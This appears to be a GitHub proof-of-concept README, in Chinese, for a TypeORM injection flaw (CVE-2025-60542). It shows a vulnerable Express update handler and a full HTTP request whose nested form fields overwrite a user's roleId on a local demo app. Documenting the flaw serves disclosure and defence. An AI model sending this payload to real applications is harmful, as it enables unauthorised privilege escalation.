cavadalizada/typeorm-sqli

# typeorm-sqli (cve-2025–60542) 观察开发者旨在只允许某些字段可编辑。 ``` const { username, contacts, company } = req.body; const updateData = { username, contacts, company, id:userId }; const userRepo = AppDataSource.getRepository(User1); const result = await userRepo.save(updateData); ``` SQL 表 ``` CREATE TABLE `user1` ( `id` int NOT NULL AUTO_INCREMENT, `username` varchar(255) NOT NULL, `contacts` varchar(255) DEFAULT NULL, `company` varchar(255) DEFAULT NULL, `roleId` int NOT NULL, PRIMARY KEY (`id`) ) ``` 使用 npm start 运行。 ``` npm i npm start ``` 将以下 payload 发送到 endpoint。 ``` POST /update-user/1 HTTP/1.1 Host: localhost:3001 Content-Length: 82 Cache-Control: max-age=0 sec-ch-ua: "Chromium";v="137", "Not/A)Brand";v="24" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Accept-Language: en-US,en;q=0.9 Origin: http://localhost:3001 Content-Type: application/x-www-form-urlencoded Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/137.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: navigate Sec-Fetch-User: ?1 Sec-Fetch-Dest: document Referer: http://localhost:3001/users/edit-myself Accept-Encoding: gzip, deflate, br Connection: keep-alive username=newusername&contacts[company]=newcompany&contacts[roleId]=3&company=acme2 ``` 观察到 roleId 被不利地更新。 注意扩展的 body 被允许。这相当常见。 ``` app.use(bodyParser.urlencoded({ extended: true })); //enable extended so we get nested json ```

标签：API安全, API密钥检测, CISA项目, CVE, GNU通用公共许可证, HTTP请求, JSON输出, Linux取证, MITM代理, Node.js, REST API, TypeORM, Web安全, 安全测试, 嵌套JSON, 情报收集, 扩展body, 攻击性安全, 数字签名, 数据验证, 漏洞研究, 用户管理, 网络安全, 自定义脚本, 蓝队分析, 输入验证, 隐私保护